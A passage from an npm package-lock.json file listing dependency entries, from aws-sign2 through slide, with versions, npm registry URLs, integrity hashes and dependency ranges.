"resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": 